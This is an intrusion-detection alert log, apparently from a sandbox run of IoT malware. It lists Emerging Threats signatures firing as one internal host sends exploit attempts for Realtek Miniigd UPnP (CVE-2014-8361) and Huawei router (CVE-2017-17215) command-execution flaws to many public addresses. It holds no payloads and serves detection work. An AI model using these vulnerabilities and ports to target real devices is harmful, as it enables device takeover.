                                      07/20/24-23:01:47.870904TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614661052869192.168.2.23187.174.160.150
                                      07/20/24-23:01:41.620386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24910852869192.168.2.2373.113.35.189
                                      07/20/24-23:01:44.660016TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25714252869192.168.2.23163.162.88.124
                                      07/20/24-23:01:31.976795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358037215192.168.2.23197.181.192.91
                                      07/20/24-23:01:53.261844TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23641252869192.168.2.23203.219.226.207
                                      07/20/24-23:01:20.603553TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25997252869192.168.2.23218.129.227.171
                                      07/20/24-23:00:59.192052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052437215192.168.2.23197.26.114.175
                                      07/20/24-23:01:06.990165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628037215192.168.2.2341.3.17.176
                                      07/20/24-23:01:48.576249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413252869192.168.2.2337.189.26.199
                                      07/20/24-23:01:51.932550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952052869192.168.2.23135.160.162.200
                                      07/20/24-23:01:42.304767TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3330652869192.168.2.23153.201.149.50
                                      07/20/24-23:01:31.322110TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5090452869192.168.2.23175.125.103.77
                                      07/20/24-23:01:56.007136TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26099052869192.168.2.23104.171.202.164
                                      07/20/24-23:01:52.599834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4813652869192.168.2.23162.239.164.172
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732037215192.168.2.23157.205.157.48
                                      07/20/24-23:01:41.337240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794852869192.168.2.23115.35.192.158
                                      07/20/24-23:00:59.194576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880437215192.168.2.23157.251.206.76
                                      07/20/24-23:02:01.201976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5346652869192.168.2.23167.60.51.106
                                      07/20/24-23:01:25.845560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614337052869192.168.2.23112.202.108.197
                                      07/20/24-23:01:47.385543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613759052869192.168.2.2348.211.124.159
                                      07/20/24-23:01:55.508957TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24396452869192.168.2.23163.75.91.9
                                      07/20/24-23:01:25.388031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6075252869192.168.2.2358.239.1.240
                                      07/20/24-23:01:47.775082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3810452869192.168.2.2337.115.2.79
                                      07/20/24-23:01:54.177524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3296452869192.168.2.23174.150.164.6
                                      07/20/24-23:01:59.234150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613334052869192.168.2.2337.223.190.191
                                      07/20/24-23:01:02.059312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5482237215192.168.2.23117.219.119.200
                                      07/20/24-23:01:09.891414TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3496252869192.168.2.23131.120.226.33
                                      07/20/24-23:01:51.979094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614137252869192.168.2.23112.142.124.162
                                      07/20/24-23:01:12.806645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4190252869192.168.2.23185.44.122.49
                                      07/20/24-23:01:52.285244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5551452869192.168.2.23129.174.206.130
                                      07/20/24-23:01:02.093903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173837215192.168.2.2341.105.49.77
                                      07/20/24-23:01:14.013456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025237215192.168.2.23128.228.244.234
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196237215192.168.2.23157.115.234.122
                                      07/20/24-23:01:31.327808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23291452869192.168.2.2397.255.56.23
                                      07/20/24-23:01:31.974656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535837215192.168.2.23157.16.40.52
                                      07/20/24-23:01:31.982801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616837215192.168.2.2341.129.91.74
                                      07/20/24-23:01:46.416206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25933652869192.168.2.2396.94.31.193
                                      07/20/24-23:01:50.483105TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614988252869192.168.2.2341.3.232.51
                                      07/20/24-23:01:10.666264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4165852869192.168.2.2372.182.219.141
                                      07/20/24-23:01:53.494330TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24853252869192.168.2.23197.243.125.183
                                      07/20/24-23:01:08.912088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3490652869192.168.2.23195.67.134.63
                                      07/20/24-23:01:41.648203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4444252869192.168.2.23223.203.126.251
                                      07/20/24-23:01:42.699478TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23925052869192.168.2.23165.86.188.195
                                      07/20/24-23:01:11.188768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5249452869192.168.2.2362.245.86.200
                                      07/20/24-23:01:41.960623TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24533452869192.168.2.23208.75.90.116
                                      07/20/24-23:01:53.057358TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25455252869192.168.2.2363.26.163.169
                                      07/20/24-23:01:40.311124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895437215192.168.2.23157.26.5.201
                                      07/20/24-23:01:20.596401TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23924852869192.168.2.23157.5.72.210
                                      07/20/24-23:01:43.946478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615705852869192.168.2.2339.124.235.174
                                      07/20/24-23:01:57.050420TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26092252869192.168.2.23163.50.116.249
                                      07/20/24-23:01:08.672944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25055652869192.168.2.2312.208.124.228
                                      07/20/24-23:02:48.156942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3543052869192.168.2.23186.52.228.17
                                      07/20/24-23:01:24.934977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526037215192.168.2.23157.203.255.180
                                      07/20/24-23:01:25.503352TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615701652869192.168.2.23213.71.93.224
                                      07/20/24-23:01:44.466756TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4035652869192.168.2.2386.24.154.203
                                      07/20/24-23:01:51.932550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25413652869192.168.2.23134.173.191.58
                                      07/20/24-23:01:10.756983TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616023052869192.168.2.2342.191.217.231
                                      07/20/24-23:00:59.192052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693437215192.168.2.23157.223.197.130
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380237215192.168.2.23190.79.68.182
                                      07/20/24-23:01:49.921076TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3524452869192.168.2.23120.69.243.217
                                      07/20/24-23:01:32.028836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549237215192.168.2.23186.54.113.175
                                      07/20/24-23:01:20.113254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680237215192.168.2.23202.114.113.132
                                      07/20/24-23:01:04.082384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862037215192.168.2.23197.41.17.240
                                      07/20/24-23:02:04.208558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23893852869192.168.2.23202.29.220.93
                                      07/20/24-23:01:44.302645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4411652869192.168.2.23119.167.95.17
                                      07/20/24-23:01:00.654988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683637215192.168.2.23197.236.128.48
                                      07/20/24-23:01:34.046616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282237215192.168.2.2341.197.119.215
                                      07/20/24-23:01:44.295391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5035652869192.168.2.23120.63.90.68
                                      07/20/24-23:01:54.980256TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24580652869192.168.2.2396.1.75.175
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898437215192.168.2.2341.231.235.189
                                      07/20/24-23:01:31.323043TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25991652869192.168.2.23213.157.19.102
                                      07/20/24-23:01:27.730585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051037215192.168.2.23157.89.78.68
                                      07/20/24-23:01:24.510301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614191852869192.168.2.23144.247.247.76
                                      07/20/24-23:02:00.484578TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5803852869192.168.2.23199.27.212.72
                                      07/20/24-23:01:42.809716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613729052869192.168.2.2317.37.38.42
                                      07/20/24-23:01:45.233561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615477452869192.168.2.23166.201.201.44
                                      07/20/24-23:01:31.322288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019252869192.168.2.2324.104.161.240
                                      07/20/24-23:01:42.799973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3419852869192.168.2.23132.171.123.209
                                      07/20/24-23:01:10.775483TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614303252869192.168.2.23144.152.137.9
                                      07/20/24-23:01:48.369883TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4097252869192.168.2.23166.102.172.20
                                      07/20/24-23:01:08.600114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4438252869192.168.2.23108.144.159.228
                                      07/20/24-23:01:40.285038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180037215192.168.2.23160.135.194.107
                                      07/20/24-23:01:51.056707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413452869192.168.2.2362.146.159.96
                                      07/20/24-23:01:41.258403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613594452869192.168.2.2384.227.123.147
                                      07/20/24-23:01:50.128003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021852869192.168.2.23118.32.91.217
                                      07/20/24-23:01:42.643745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5357452869192.168.2.23219.68.37.27
                                      07/20/24-23:01:42.780168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614656852869192.168.2.2393.36.62.56
                                      07/20/24-23:01:02.721582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614004852869192.168.2.23209.101.108.92
                                      07/20/24-23:01:00.639011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398037215192.168.2.23157.230.88.31
                                      07/20/24-23:01:11.634077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292237215192.168.2.2341.74.2.198
                                      07/20/24-23:01:40.285038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840237215192.168.2.23157.59.143.10
                                      07/20/24-23:01:41.660997TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25399652869192.168.2.23151.105.247.52
                                      07/20/24-23:01:24.960642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460837215192.168.2.23197.66.163.45
                                      07/20/24-23:01:45.582631TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613757652869192.168.2.2347.192.243.189
                                      07/20/24-23:01:08.615260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25281652869192.168.2.23212.172.247.72
                                      07/20/24-23:01:27.739158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297837215192.168.2.23157.195.217.147
                                      07/20/24-23:01:09.027075TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4363252869192.168.2.23188.92.250.125
                                      07/20/24-23:01:51.916672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24673252869192.168.2.2381.144.207.10
                                      07/20/24-23:00:59.185032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462637215192.168.2.2341.160.207.169
                                      07/20/24-23:01:43.227281TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615981652869192.168.2.23155.22.111.5
                                      07/20/24-23:01:44.713195TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614750452869192.168.2.23105.221.97.172
                                      07/20/24-23:01:47.674845TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614413452869192.168.2.23134.168.191.164
                                      07/20/24-23:01:56.880291TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064652869192.168.2.23173.68.146.233
                                      07/20/24-23:01:44.510114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952252869192.168.2.23108.46.15.204
                                      07/20/24-23:01:27.664606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628837215192.168.2.2341.157.179.142
                                      07/20/24-23:02:18.238800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3534852869192.168.2.23140.189.156.39
                                      07/20/24-23:01:52.193913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615449052869192.168.2.23179.220.184.21
                                      07/20/24-23:01:45.978835TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4001652869192.168.2.23179.51.3.253
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546037215192.168.2.23109.94.51.165
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4191837215192.168.2.23157.239.203.194
                                      07/20/24-23:01:11.820979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442637215192.168.2.23197.175.44.160
                                      07/20/24-23:01:44.993925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3695852869192.168.2.23114.19.125.68
                                      07/20/24-23:01:59.154601TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3759852869192.168.2.23177.72.81.243
                                      07/20/24-23:01:27.654173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360037215192.168.2.23197.252.135.214
                                      07/20/24-23:01:07.016889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464437215192.168.2.23157.211.80.133
                                      07/20/24-23:01:12.807101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25393652869192.168.2.2335.68.164.37
                                      07/20/24-23:01:08.632574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4903052869192.168.2.2358.116.31.11
                                      07/20/24-23:01:45.095767TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4216452869192.168.2.2386.220.55.191
                                      07/20/24-23:01:43.110964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6093252869192.168.2.2373.152.115.130
                                      07/20/24-23:01:27.650337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415237215192.168.2.23153.216.34.227
                                      07/20/24-23:01:41.412156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4455452869192.168.2.23154.201.154.131
                                      07/20/24-23:02:01.645032TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615479852869192.168.2.23222.178.130.155
                                      07/20/24-23:01:59.707284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614753852869192.168.2.2342.196.122.240
                                      07/20/24-23:01:42.749469TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24645452869192.168.2.23111.186.32.47
                                      07/20/24-23:01:59.302806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613843252869192.168.2.23217.255.162.70
                                      07/20/24-23:01:41.370646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613608052869192.168.2.2334.44.162.23
                                      07/20/24-23:01:47.486502TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615510252869192.168.2.2338.182.132.190
                                      07/20/24-23:01:01.448947TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4133252869192.168.2.23119.187.229.164
                                      07/20/24-23:01:14.158864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614242452869192.168.2.23138.74.14.28
                                      07/20/24-23:01:31.976984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865437215192.168.2.2376.88.28.157
                                      07/20/24-23:01:01.901550TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613351852869192.168.2.2327.130.132.139
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956437215192.168.2.23157.198.81.69
                                      07/20/24-23:01:02.119631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859637215192.168.2.23197.102.112.63
                                      07/20/24-23:01:04.039128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838437215192.168.2.23197.85.169.251
                                      07/20/24-23:01:31.978141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205437215192.168.2.23197.65.9.72
                                      07/20/24-23:01:20.599458TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23435052869192.168.2.23130.80.10.211
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773037215192.168.2.23197.57.71.77
                                      07/20/24-23:01:45.064977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614586252869192.168.2.23177.220.208.210
                                      07/20/24-23:01:47.652628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615070252869192.168.2.232.77.241.40
                                      07/20/24-23:01:51.919746TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25783252869192.168.2.23135.215.110.183
                                      07/20/24-23:02:37.919900TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613597852869192.168.2.23152.191.160.62
                                      07/20/24-23:01:42.072139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614531652869192.168.2.23145.93.255.182
                                      07/20/24-23:01:20.132510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027237215192.168.2.23222.12.61.68
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930637215192.168.2.2341.211.122.175
                                      07/20/24-23:01:42.136560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6004852869192.168.2.2367.41.35.87
                                      07/20/24-23:01:48.490989TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25810052869192.168.2.23195.45.218.64
                                      07/20/24-23:01:08.634900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24577052869192.168.2.23201.173.108.254
                                      07/20/24-23:01:44.878540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25174052869192.168.2.2390.145.205.177
                                      07/20/24-23:01:57.346494TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614145652869192.168.2.2327.214.50.214
                                      07/20/24-23:01:31.314906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210252869192.168.2.2390.135.90.32
                                      07/20/24-23:01:31.982801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897037215192.168.2.23157.51.246.221
                                      07/20/24-23:01:41.176787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4982652869192.168.2.2344.113.54.165
                                      07/20/24-23:01:42.042815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5682652869192.168.2.23157.210.162.125
                                      07/20/24-23:01:42.632123TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613460052869192.168.2.23134.135.7.1
                                      07/20/24-23:01:43.305781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615264852869192.168.2.231.198.183.23
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715437215192.168.2.2341.165.136.62
                                      07/20/24-23:01:43.063994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614578252869192.168.2.23220.31.50.128
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164637215192.168.2.2379.246.175.175
                                      07/20/24-23:01:44.602081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614951452869192.168.2.2370.50.33.70
                                      07/20/24-23:01:32.073087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649637215192.168.2.23197.200.114.238
                                      07/20/24-23:02:18.238800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6046452869192.168.2.23171.248.87.10
                                      07/20/24-23:01:58.905147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24693252869192.168.2.2359.213.19.147
                                      07/20/24-23:01:00.658201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835437215192.168.2.23157.80.93.33
                                      07/20/24-23:01:20.592206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096452869192.168.2.23221.64.55.120
                                      07/20/24-23:01:42.915641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3790852869192.168.2.23195.86.64.66
                                      07/20/24-23:01:53.066716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613718452869192.168.2.23192.245.224.230
                                      07/20/24-23:01:47.808678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5334252869192.168.2.23206.56.63.93
                                      07/20/24-23:01:45.667239TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5332852869192.168.2.23153.234.108.85
                                      07/20/24-23:01:27.649697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851637215192.168.2.23197.163.104.51
                                      07/20/24-23:01:34.048618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880637215192.168.2.2380.40.99.121
                                      07/20/24-23:01:14.049603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511637215192.168.2.23107.86.91.27
                                      07/20/24-23:01:14.105395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535037215192.168.2.23197.238.188.119
                                      07/20/24-23:01:44.469869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25287252869192.168.2.2343.168.154.99
                                      07/20/24-23:01:08.565561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5469052869192.168.2.2337.205.238.167
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942837215192.168.2.23197.58.20.251
                                      07/20/24-23:01:47.541928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3497852869192.168.2.2380.133.252.53
                                      07/20/24-23:01:31.314906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4684452869192.168.2.23152.43.74.118
                                      07/20/24-23:01:43.415157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5821252869192.168.2.2359.121.190.157
                                      07/20/24-23:01:44.520254TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24839652869192.168.2.23190.100.221.147
